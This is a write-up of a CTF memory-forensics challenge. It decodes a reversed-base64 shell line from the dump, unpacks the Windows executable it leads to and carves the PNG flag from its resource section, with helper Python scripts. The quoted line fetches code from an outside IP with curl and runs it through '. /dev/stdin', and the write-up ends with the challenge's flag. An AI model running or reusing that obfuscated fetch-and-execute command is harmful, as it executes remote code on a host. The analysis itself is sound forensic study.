[Sharif University CTF 2016] [Forensic 400 – Memdump] Write Up

Description

We were trying to capture the flag too! But that’s what it left for us.

Resolution

We began by checking the strings contained in the file:

$ strings memdump > memdump.txt

One line was very interesting:

echo KMWdyxGItMHI1QjLxgzMuUzMuUjMv4Udll0a0xGe|rev|openssl enc -a -d | rev | . /dev/stdin | cat /tmp/.XpUma5 - | display -

We tried the decoding part of the command on our side and got a URL:

$ echo KMWdyxGItMHI1QjLxgzMuUzMuUjMv4Udll0a0xGe|rev|openssl enc -a -d | rev
curl -s 54.183.53.52/NueIktlx
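The decode chain is only the first half of the line found in the dump: `rev | openssl enc -a -d | rev` turns the string back into a `curl` command, `. /dev/stdin` sources (executes) whatever that command prints, and the result is concatenated with `/tmp/.XpUma5` and handed to `display`. Reversing the text before base64-encoding it hides the recognisable base64 prefix of `curl`, which is why a plain base64 grep over `strings` output misses it. The Python below is an added example, not part of the write-up: it reproduces the `rev | openssl enc -a -d | rev` stage and scans `strings`-style output for that idiom, skipping lines whose payload is not valid base64. The `STRINGS_OUTPUT` sample is constructed for this example; only the long `echo` line comes from the dump.

```python
import base64
import binascii
import re

# Constructed excerpt of `strings memdump` output. The long echo line is the
# one quoted in the write-up; the other lines are filler added for this example.
STRINGS_OUTPUT = """\
!This program cannot be run in DOS mode.
echo KMWdyxGItMHI1QjLxgzMuUzMuUjMv4Udll0a0xGe|rev|openssl enc -a -d | rev | . /dev/stdin | cat /tmp/.XpUma5 - | display -
echo ZZZZZ|rev|openssl enc -a -d|rev
/lib/x86_64-linux-gnu/libc.so.6
"""

# Matches the "echo <b64> | rev | openssl enc -a -d | rev" idiom, with or
# without spaces around the pipes. The payload class is limited to the base64
# alphabet so the match stops at the first pipe instead of swallowing "|rev|...".
OBFUSCATED_ECHO = re.compile(
    r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*rev\s*\|\s*openssl\s+enc\s+-a\s+-d\s*\|\s*rev"
)


def rev(s: str) -> str:
    """Behave like rev(1): reverse each line, keep the line order."""
    return "\n".join(line[::-1] for line in s.split("\n"))


def decode_stage(encoded: str):
    """Reproduce `echo X | rev | openssl enc -a -d | rev`.

    Returns the recovered command, or None when the reversed text is not
    valid base64 (a decoy or a false regex hit).
    """
    try:
        decoded = base64.b64decode(rev(encoded))
    except binascii.Error:
        return None
    return rev(decoded.decode("ascii", errors="replace")).strip()


def find_obfuscated_commands(strings_output: str):
    """Return (encoded, decoded_or_None) for every line using the idiom."""
    hits = []
    for line in strings_output.splitlines():
        m = OBFUSCATED_ECHO.search(line)
        if m:
            hits.append((m.group(1), decode_stage(m.group(1))))
    return hits


if __name__ == "__main__":
    for enc, dec in find_obfuscated_commands(STRINGS_OUTPUT):
        print(f"{enc!r} -> {dec!r}")
```

Running it prints the `curl -s 54.183.53.52/NueIktlx` line recovered in the write-up and `None` for the decoy; nothing in the chain is executed, which is the point of reproducing the decode stage in a script rather than pasting the original pipeline into a shell.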

The URL wasn’t accessible anymore, but going to the parent directory of the website, we found a file “jKOpqo”.

Let’s check what kind of file it is:

$ file jKOpqo
jKOpqo: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

Running this file on Windows gave us:

Mhh.. Nothing interesting, let’s debug it using IDA.
[screenshot: memdump-ida]

Too bad, it’s a packed executable. We checked the packer signature using DiE (Detect It Easy):
[screenshot: memdump-die]

An ASPack-packed executable is easy to dump using the OllyDump plugin.
We launched OllyDbg and checked the entry point of the packed executable:
[screenshot: memdump-ollydbg]

As the plugin had already filled in the correct entry point, we just had to dump the file.
[screenshot: memdump-ollydump]

(For lazy people, you can also use an online decompiler like https://retdec.com.)

We then have an unpacked executable with a PNG embedded inside the .rsrc section:

;  section: .rsrc
0x403000:   00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00   |................|
0x403010:   58 00 00 80 18 00 00 80  00 00 00 00 00 00 00 00   |X...............|
0x403020:   00 00 00 00 01 00 00 00  62 00 00 80 30 00 00 80   |........b...0...|
0x403030:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00   |................|
0x403040:   00 00 00 00 48 00 00 00  6c 30 00 00 b3 0e 00 00   |....H...l0......|
0x403050:   00 00 00 00 00 00 00 00  04 00 46 00 4c 00 41 00   |..........F.L.A.|
0x403060:   47 00 03 00 49 00 4d 00  47 00 00 00 89 50 4e 47   |G...I.M.G....PNG|
0x403070:   0d 0a 1a 0a 00 00 00 0d  49 48 44 52 00 00 02 58   |........IHDR...X|
0x403080:   00 00 02 58 08 03 00 00  00 89 b8 68 ee 00 00 03   |...X.......h....|
0x403090:   00 50 4c 54 45 00 00 00  01 01 01 02 02 02 03 03   |.PLTE...........|
0x4030a0:   03 04 04 04 05 05 05 06  06 06 07 07 07 08 08 08   |................|
[...]
0x403f00:   00 00 00 00 00 00 00 f8  ff f2 2f 3c 76 55 8c 15   |........../<vU..|
0x403f10:   4c 6c ec 00 00 00 00 49  45 4e 44 ae 42 60 82 00   |Ll.....IEND.B`..|
0x403f20:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|

The PNG file format specification says:

89 50 4e 47 |.PNG| //Header of a PNG file
[...]
49 45 4e 44 |IEND| //Ending chunk of a PNG
ae 42 60 82 |.B`.| //and its CRC.
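Matching the byte sequence between the `.PNG` header and `IEND` + CRC with a regex works when the dump is clean, but a bare signature search also fires on false positives, and a truncated image is only noticed when the viewer refuses to open it. The Python below is an added example, not the write-up’s own sed/regex command: it carves a PNG out of a blob the way a chunk-aware tool would, walking `length | type | data | CRC` chunks, verifying each CRC32, and stopping at `IEND`. The `.rsrc` stand-in it carves from is constructed for this example (a 1x1 greyscale PNG behind the UTF-16 resource names `FLAG` and `IMG` seen in the hexdump); the file name `FLAG.IMG` follows the write-up.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"   # 89 50 4e 47 0d 0a 1a 0a


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed 1x1 8-bit greyscale PNG (stand-in for the 600x600 FLAG image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # w, h, depth, colour, comp, filter, interlace
    scanline = b"\x00\x7f"                               # filter type 0 + one grey pixel
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline))
            + png_chunk(b"IEND", b""))


def build_sample_rsrc() -> bytes:
    """Constructed stand-in for the .rsrc section: directory padding, the UTF-16
    resource names FLAG and IMG as in the hexdump, the PNG, then trailing zeros."""
    names = b"\x04\x00F\x00L\x00A\x00G\x00\x03\x00I\x00M\x00G\x00\x00\x00"
    return b"\x00" * 0x58 + names + build_sample_png() + b"\x00" * 0x20


def carve_png(blob: bytes, start: int = 0):
    """Return (offset, bytes) of the first complete PNG at or after `start`, else None.

    Chunks are walked and CRC-checked, so a stray signature, a corrupted chunk
    or an image cut off before IEND is rejected instead of written out broken.
    """
    off = blob.find(PNG_SIG, start)
    while off != -1:
        pos = off + len(PNG_SIG)
        while pos + 12 <= len(blob):                      # 4 len + 4 type + 4 crc minimum
            length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
            end = pos + 12 + length
            if end > len(blob):
                break                                     # truncated: give up on this candidate
            data = blob[pos + 8:pos + 8 + length]
            crc, = struct.unpack(">I", blob[end - 4:end])
            if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
                break                                     # corrupt chunk: not a real PNG here
            pos = end
            if ctype == b"IEND":
                return off, blob[off:pos]
        off = blob.find(PNG_SIG, off + 1)
    return None


def png_info(png: bytes):
    """(width, height, bit_depth, colour_type) parsed from the IHDR chunk."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG with a leading IHDR chunk")
    return struct.unpack(">IIBB", png[16:26])


if __name__ == "__main__":
    found = carve_png(build_sample_rsrc())
    if found:
        off, png = found
        print(f"PNG at 0x{off:x}, {len(png)} bytes, IHDR={png_info(png)}")
        with open("FLAG.IMG", "wb") as fh:
            fh.write(png)
```

On the real dump the same `png_info` call on the carved bytes gives 600x600, 8-bit, colour type 3 (palette), which is why a `PLTE` chunk follows `IHDR` in the hexdump above. The constant `ae 42 60 82` at the end of every PNG is simply the CRC32 of the four bytes `IEND` with no data, so it can be checked rather than pattern-matched.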

Using a regex and sed, we extracted the PNG bytes as the following hexdump and turned them back into a file:

echo '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' | xxd -r -p > FLAG.IMG

[image: FLAG.IMG]

SharifCTF{39057E5702F8167AA641CA9AD7E9A15E}

The flag was “39057E5702F8167AA641CA9AD7E9A15E”.
